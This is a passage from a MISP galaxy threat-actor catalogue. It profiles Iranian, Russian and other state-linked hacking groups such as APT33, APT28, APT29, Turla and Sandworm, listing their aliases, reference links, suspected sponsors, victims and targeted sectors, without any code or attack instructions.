cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['U.S. government/defense sector websites', 'Saudi Arabia', 'Israel', 'Iraq', 'United Kingdom'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Defense', 'Diplomacy', 'Military', 'Technology', 'Government, Administration'] |
APT33
Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT33.
Known Synonyms |
---|
APT 33 |
ATK35 |
COBALT TRINITY |
Elfin |
G0064 |
HOLMIUM |
MAGNALLIUM |
Peach Sandstorm |
Refined Kitten |
TA451 |
Internal MISP references
UUID 4f69ec6d-cb6b-42af-b8e2-920a2aa4be10
which can be used as unique global reference for APT33
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/ - webarchive
- https://www.brighttalk.com/webcast/10703/275683 - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://attack.mitre.org/groups/G0064/ - webarchive
- https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-33 - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
capabilities | STONEDRILL wiper, variants of TURNEDUP malware |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Saudi Arabia', 'South Korea'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | IR |
mode-of-operation | IT network limited, information gathering against industrial orgs |
victimology | Petrochemical, Aerospace, Saudi Arabia |
Magic Kitten
Earliest known activity dates back to November 2008. An established group of cyber attackers based in Iran, who carried out several campaigns in 2013, including a series of attacks targeting political dissidents and those supporting the Iranian political opposition.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Magic Kitten.
Known Synonyms |
---|
Group 42 |
VOYEUR |
Internal MISP references
UUID 2e77511d-f72f-409e-9b64-e2a15efe9bf4
which can be used as unique global reference for Magic Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
targeted-sector | ['Opposition', 'Dissidents', 'Political party'] |
Rocket Kitten
Targets Saudi Arabia, Israel, the US, Iran, high-ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rocket Kitten.
Known Synonyms |
---|
Operation Woolen Goldfish |
Operation Woolen-Goldfish |
TEMP.Beanie |
Thamar Reservoir |
Timberworm |
Internal MISP references
UUID f873db71-3d53-41d5-b141-530675ade27a
which can be used as unique global reference for Rocket Kitten
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf - webarchive
- http://www.clearskysec.com/thamar-reservoir/ - webarchive
- https://citizenlab.ca/2015/08/iran_two_factor_phishing/ - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ - webarchive
- https://en.wikipedia.org/wiki/Rocket_Kitten - webarchive
- https://www.cfr.org/interactive/cyber-operations/rocket-kitten - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Saudi Arabia', 'Venezuela', 'Afghanistan', 'United Arab Emirates', 'Iran', 'Israel', 'Iraq', 'Kuwait', 'Turkey', 'Canada', 'Yemen', 'United Kingdom', 'Egypt', 'Syria', 'Jordan'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Activists', 'Defense', 'Journalist', 'Research - Innovation', 'Academia - University', 'Government, Administration'] |
Cleaver
A group of cyber actors utilizing infrastructure located in Iran have been conducting computer network exploitation activity against public and private U.S. organizations, including Cleared Defense Contractors (CDCs), academic institutions, and energy sector companies. This threat actor targets entities in the government, energy, and technology sectors that are located in or do business with Saudi Arabia.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cleaver.
Known Synonyms |
---|
Alibaba |
Cobalt Gypsy |
G0003 |
Op Cleaver |
Operation Cleaver |
TG-2889 |
Tarh Andishan |
Internal MISP references
UUID 86724806-7ec9-4a48-a0a7-ecbde3bf4810
which can be used as unique global reference for Cleaver
in MISP communities and other software using the MISP galaxy
External references
- https://www.secureworks.com/research/the-curious-case-of-mia-ash - webarchive
- https://www.cfr.org/interactive/cyber-operations/operation-cleaver - webarchive
- http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing - webarchive
- https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations - webarchive
- https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/ - webarchive
- https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf - webarchive
- https://attack.mitre.org/groups/G0003/ - webarchive
- https://xorl.wordpress.com/2021/05/06/iran-cyber-operations-groups/ - webarchive
- https://www.secureworks.com/research/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles - webarchive
- https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten - webarchive
- https://www.cfr.org/cyber-operations/operation-cleaver - webarchive
- https://securityaffairs.co/wordpress/33682/cyber-crime/ali-baba-apt-middle-east.html - webarchive
- https://scadahacker.com/library/Documents/Cyber_Events/Cylance%20-%20Operation%20Cleaver%20Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Canada', 'France', 'Israel', 'Mexico', 'Saudi Arabia', 'China', 'Germany', 'United States', 'Pakistan', 'South Korea', 'United Kingdom', 'India', 'Kuwait', 'Qatar', 'Turkey'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Defense', 'Energy', 'Technology', 'Government, Administration', 'Academia - University'] |
Sands Casino
Internal MISP references
UUID 1de1a64e-ea14-4e79-9e41-6958bdb6c0ff
which can be used as unique global reference for Sands Casino
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
Rebel Jackal
This is a pro-Islamist organization that generally conducts attacks motivated by real world events in which its members believe that members of the Muslim faith were wronged. Its attacks generally involve website defacements; however, the group did develop a RAT that it refers to as Fallaga RAT, but which appears to simply be a fork of the njRAT malware popular amongst hackers in the Middle East/North Africa region.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rebel Jackal.
Known Synonyms |
---|
FallagaTeam |
Internal MISP references
UUID 29af2812-f7fb-4edb-8cc4-86d0d9e3644b
which can be used as unique global reference for Rebel Jackal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TN |
motive | Hacktivists-Nationalists |
Viking Jackal
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Viking Jackal.
Known Synonyms |
---|
Vikingdom |
Internal MISP references
UUID 7f99ba32-421c-4905-9deb-006e8eda40c1
which can be used as unique global reference for Viking Jackal
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | AE |
APT28
The Sofacy Group (also known as APT28, Pawn Storm, Fancy Bear and Sednit) is a cyber espionage group believed to have ties to the Russian government. Likely operating since 2007, the group is known to target government, military, and security organizations. It has been characterized as an advanced persistent threat.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT28.
Known Synonyms |
---|
APT-C-20 |
ATK5 |
Blue Athena |
BlueDelta |
FANCY BEAR |
FROZENLAKE |
Fancy Bear |
Fighting Ursa |
Forest Blizzard |
G0007 |
Grizzly Steppe |
Group 74 |
IRON TWILIGHT |
ITG05 |
Pawn Storm |
SIG40 |
SNAKEMACKEREL |
STRONTIUM |
Sednit |
Sofacy |
Swallowtail |
T-APT-12 |
TA422 |
TG-4127 |
Tsar Team |
UAC-0028 |
Internal MISP references
UUID 5b4ee3ea-eee3-4c8e-8323-85ae32658754
which can be used as unique global reference for APT28
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/groups/G0007/ - webarchive
- https://en.wikipedia.org/wiki/Fancy_Bear - webarchive
- https://en.wikipedia.org/wiki/Sofacy_Group - webarchive
- https://www.bbc.com/news/technology-37590375 - webarchive
- https://www.bbc.co.uk/news/technology-45257081 - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-28 - webarchive
- https://www.apnews.com/4d174e45ef5843a0ba82e804f080988f - webarchive
- https://www.voanews.com/a/iaaf-hack-fancy-bears/3793874.html - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
- https://www.dw.com/en/hackers-lurking-parliamentarians-told/a-19564630 - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/ - webarchive
- https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/wp-mandiant-matryoshka-mining.pdf - webarchive
- https://www.eff.org/deeplinks/2015/08/new-spear-phishing-campaign-pretends-be-eff - webarchive
- https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf - webarchive
- https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware - webarchive
- https://www.wired.com/story/russian-fancy-bears-hackers-release-apparent-ioc-emails/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacy-attacks-multiple-government-entities/ - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- https://www.msn.com/en-nz/news/world/russian-hackers-accused-of-targeting-un-chemical-weapons-watchdog-mh17-files/ar-BBNV2ny - webarchive
- https://unit42.paloaltonetworks.com/unit42-new-sofacy-attacks-against-us-government-agency/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-let-ride-sofacy-groups-dealerschoice-attacks-continue/ - webarchive
- https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/ - webarchive
- https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/ - webarchive
- https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2018/08/20/we-are-taking-new-steps-against-broadening-threats-to-democracy/ - webarchive
- https://www.lse.co.uk/AllNews.asp?code=kwdwehme&headline=Russian_Hackers_Suspected_In_Cyberattack_On_German_Parliament - webarchive
- https://www.volkskrant.nl/cultuur-media/russen-faalden-bij-hackpogingen-ambtenaren-op-nederlandse-ministeries~b77ff391/ - webarchive
- https://www.ibtimes.co.uk/russian-hackers-fancy-bear-likely-breached-olympic-drug-testing-agency-dnc-experts-say-1577508 - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-disrupts-apt28-hacking-campaign-aimed-at-us-midterm-elections/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected - webarchive
- https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf - webarchive
- https://www.reuters.com/article/us-sweden-doping/swedish-sports-body-says-anti-doping-unit-hit-by-hacking-attack-idUSKCN1IG2GN - webarchive
- https://researchcenter.paloaltonetworks.com/2016/10/unit42-dealerschoice-sofacys-flash-player-exploit-platform/ - webarchive
- https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/ - webarchive
- https://www.washingtonpost.com/technology/2019/02/20/microsoft-says-it-has-found-another-russian-operation-targeting-prominent-think-tanks/?utm_term=.870ff11468ae - webarchive
- https://www.handelsblatt.com/today/politics/election-risks-russia-linked-hackers-target-german-political-foundations/23569188.html?ticket=ST-2696734-GRHgtQukDIEXeSOwksXO-ap1 - webarchive
- https://www.accenture.com/t20190213T141124Z__w__/us-en/_acnmedia/PDF-94/Accenture-SNAKEMACKEREL-Threat-Campaign-Likely-Targeting-NATO-Members-Defense-and-Military-Outlets.pdf - webarchive
- https://marcoramilli.com/2019/12/05/apt28-attacks-evolution/ - webarchive
- https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/ - webarchive
- https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/ - webarchive
- https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/fighting-ursa/ - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://bluepurple.binaryfirefly.com/p/bluepurple-pulse-week-ending-june-64e - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['Georgia', 'France', 'Jordan', 'United States', 'Hungary', 'World Anti-Doping Agency', 'Armenia', 'Tajikistan', 'Japan', 'NATO', 'Ukraine', 'Belgium', 'Pakistan', 'Asia Pacific Economic Cooperation', 'International Association of Athletics Federations', 'Turkey', 'Mongolia', 'OSCE', 'United Kingdom', 'Germany', 'Poland', 'European Commission', 'Afghanistan', 'Kazakhstan', 'China'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Military', 'Government, Administration', 'Security Service'] |
APT29
A 2015 report by F-Secure describes APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large-scale spear-phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash-and-grab approach involving a fast but noisy break-in followed by the rapid collection and exfiltration of as much data as possible. If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long-term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks.
It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss).'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT29.
Known Synonyms |
---|
ATK7 |
Blue Kitsune |
BlueBravo |
COZY BEAR |
Cloaked Ursa |
G0016 |
Grizzly Steppe |
Group 100 |
IRON HEMLOCK |
ITG11 |
Minidionis |
Nobelium |
SeaDuke |
TA421 |
The Dukes |
UAC-0029 |
YTTRIUM |
Internal MISP references
UUID b2056ff0-00b9-482e-b11c-c771daa5f28a
which can be used as unique global reference for APT29
in MISP communities and other software using the MISP galaxy
External references
- https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/ - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf - webarchive
- https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html - webarchive
- https://www.cfr.org/interactive/cyber-operations/dukes - webarchive
- https://pylos.co/2018/11/18/cozybear-in-from-the-cold/ - webarchive
- https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hemlock - webarchive
- https://attack.mitre.org/groups/G0016 - webarchive
- https://unit42.paloaltonetworks.com/atoms/cloaked-ursa/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'China', 'New Zealand', 'Ukraine', 'Romania', 'Georgia', 'Japan', 'South Korea', 'Belgium', 'Kazakhstan', 'Brazil', 'Mexico', 'Turkey', 'Portugal', 'India', 'Germany'] |
cfr-target-category | ['Government', 'Private sector'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Think Tanks', 'Government, Administration'] |
Turla
A 2014 Guardian article described Turla as: 'Dubbed the Turla hackers, initial intelligence had indicated western powers were key targets, but it was later determined embassies for Eastern Bloc nations were of more interest. Embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany were all attacked, though researchers from Kaspersky Lab and Symantec could not confirm which countries were the true targets. In one case from May 2012, the office of the prime minister of a former Soviet Union member country was infected, leading to 60 further computers being affected, Symantec researchers said. There were some other victims, including the ministry for health of a Western European country, the ministry for education of a Central American country, a state electricity provider in the Middle East and a medical organisation in the US, according to Symantec. It is believed the group was also responsible for a much-documented 2008 attack on the US Central Command. The attackers, who continue to operate, have ostensibly sought to carry out surveillance on targets and pilfer data, though their use of encryption across their networks has made it difficult to ascertain exactly what the hackers took. Kaspersky Lab, however, picked up a number of the attackers' searches through their victims' emails, which included terms such as "Nato" and "EU energy dialogue". Though attribution is difficult to substantiate, Russia has previously been suspected of carrying out the attacks and Symantec's Gavin O'Gorman told the Guardian a number of the hackers appeared to be using Russian names and language in their notes for their malicious code. Cyrillic was also seen in use.'
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Turla.
Known Synonyms |
---|
ATK13 |
Blue Python |
G0010 |
Group 88 |
Hippo Team |
IRON HUNTER |
ITG12 |
KRYPTON |
MAKERSMARK |
Pacifier APT |
Pfinet |
Popeye |
SIG23 |
SUMMIT |
Secret Blizzard |
Snake |
TAG_0530 |
UAC-0003 |
UAC-0024 |
UAC-0144 |
UNC4210 |
Uroburos |
VENOMOUS Bear |
WRAITH |
Waterbug |
Internal MISP references
UUID fa80877c-f509-4daf-8b62-20aba1635f68
which can be used as unique global reference for Turla
in MISP communities and other software using the MISP galaxy
External references
- https://www.circl.lu/pub/tr-25/ - webarchive
- https://securelist.com/introducing-whitebear/81638/ - webarchive
- https://securelist.com/the-epic-turla-operation/65545/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/turla - webarchive
- https://www.nytimes.com/2010/08/26/technology/26cyber.html - webarchive
- https://securelist.com/blog/research/67962/the-penquin-turla-2/ - webarchive
- https://www.kaspersky.com/blog/moonlight-maze-the-lessons/6713/ - webarchive
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf - webarchive
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/ - webarchive
- https://threatpost.com/linux-modules-connected-to-turla-apt-discovered/109765/ - webarchive
- https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/ - webarchive
- https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/ - webarchive
- https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf - webarchive
- https://yle.fi/uutiset/osasto/news/russian_group_behind_2013_foreign_ministry_hack/8591548 - webarchive
- https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/ - webarchive
- https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/ - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/ - webarchive
- https://docs.broadcom.com/doc/waterbug-attack-group - webarchive
- https://www.theguardian.com/technology/2014/aug/07/turla-hackers-spying-governments-researcher-kaspersky-symantec - webarchive
- https://www.bleepingcomputer.com/news/security/turla-outlook-backdoor-uses-clever-tactics-for-stealth-and-persistence/ - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf - webarchive
- https://www.melani.admin.ch/melani/en/home/dokumentation/reports/technical-reports/technical-report_apt_case_ruag.html - webarchive
- https://unit42.paloaltonetworks.com/unit42-kazuar-multiplatform-espionage-backdoor-api-access/ - webarchive
- https://www.engadget.com/2017/06/07/russian-malware-hidden-britney-spears-instagram/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf - webarchive
- https://www.trendmicro.com/vinfo/vn/security/news/cyber-attacks/cyberespionage-group-turla-deploys-backdoor-ahead-of-g20-summit - webarchive
- https://www.zdnet.com/article/this-hacking-gang-just-updated-the-malware-it-uses-against-uk-targets/ - webarchive
- https://attack.mitre.org/groups/G0010/ - webarchive
- https://www.telsy.com/turla-venomous-bear-updates-its-arsenal-newpass-appears-on-the-apt-threat-scene/ - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hunter - webarchive
- https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/ - webarchive
- https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag - webarchive
- https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://cip.gov.ua/services/cm/api/attachment/download?id=60068 - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['France', 'Romania', 'Kazakhstan', 'Poland', 'Tajikistan', 'Russia', 'United States', 'Saudi Arabia', 'Germany', 'India', 'Belarus', 'Netherlands', 'Iran', 'Uzbekistan', 'Iraq'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Government, Administration', 'Education', 'Electric', 'Energy', 'Health'] |
ENERGETIC BEAR
A Russian group that collects intelligence on the energy industry.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ENERGETIC BEAR.
Known Synonyms |
---|
ALLANITE |
ATK6 |
BERSERK BEAR |
BROMINE |
Blue Kraken |
CASTLE |
Crouching Yeti |
DYMALLOY |
Dragonfly |
G0035 |
Ghost Blizzard |
Group 24 |
Havex |
IRON LIBERTY |
ITG15 |
Koala Team |
TG-4192 |
Internal MISP references
UUID 64d6559c-6d5c-4585-bbf9-c17868f763ee
which can be used as unique global reference for ENERGETIC BEAR
in MISP communities and other software using the MISP galaxy
External references
- https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet - webarchive
- https://web.archive.org/web/20161020180305/http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/ - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf - webarchive
- http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans - webarchive
- https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/crouching-yeti - webarchive
- https://www.reuters.com/article/us-ukraine-cyber-attack-energy-idUSKBN1521BA - webarchive
- https://dragos.com/wp-content/uploads/CrashOverride-01.pdf - webarchive
- https://www.independent.ie/irish-news/statesponsored-hackers-targeted-eirgrid-electricity-network-in-devious-attack-36005921.html - webarchive
- https://www.riskiq.com/blog/labs/energetic-bear/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
- https://www.kaspersky.com/resource-center/threats/crouching-yeti-energetic-bear-malware-threat - webarchive
- https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672 - webarchive
- https://attack.mitre.org/groups/G0035/ - webarchive
- https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector - webarchive
- https://dragos.com/adversaries.html - webarchive
- https://dragos.com/media/2017-Review-Industrial-Control-System-Threats.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/dymalloy - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 75 |
cfr-suspected-state-sponsor | Russian Federation |
cfr-suspected-victims | ['United States', 'Germany', 'Turkey', 'China', 'Spain', 'France', 'Ireland', 'Japan', 'Italy', 'Poland'] |
cfr-target-category | ['Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
country | RU |
targeted-sector | ['Energy'] |
Sandworm
This threat actor targets industrial control systems associated with electricity and power generation, using a tool called Black Energy, for espionage, denial of service, and data destruction purposes. Some believe that the threat actor is linked to the 2015 compromise of the Ukrainian electrical grid and to a distributed denial of service prior to the Russian invasion of Georgia. It is believed to be responsible for the 2008 DDoS attacks in Georgia and the 2015 Ukraine power grid outage.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sandworm.
Known Synonyms |
---|
APT44 |
Blue Echidna |
ELECTRUM |
FROZENBARENTS |
G0034 |
IRIDIUM |
IRON VIKING |
Quedagh |
Seashell Blizzard |
TEMP.Noble |
TeleBots |
UAC-0082 |
UAC-0113 |
VOODOO BEAR |
Internal MISP references
UUID f512de42-f76b-40d2-9923-59e7dbdfec35
which can be used as unique global reference for Sandworm
in MISP communities and other software using the MISP galaxy
External references
- https://dragos.com/blog/crashoverride/CrashOverride-01.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-163A - webarchive
- https://ics.sans.org/blog/2016/01/09/confirmation-of-a-coordinated-attack-on-the-ukrainian-power-grid - webarchive
- https://web.archive.org/web/20141016132823/https://www.symantec.com/connect/blogs/sandworm-windows-zero-day-vulnerability-being-actively-exploited-targeted-attacks - webarchive
- https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-outage - webarchive
- https://web.archive.org/web/20141224060545/http://blog.trendmicro.com/trendlabs-security-intelligence/timeline-of-sandworm-attacks/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
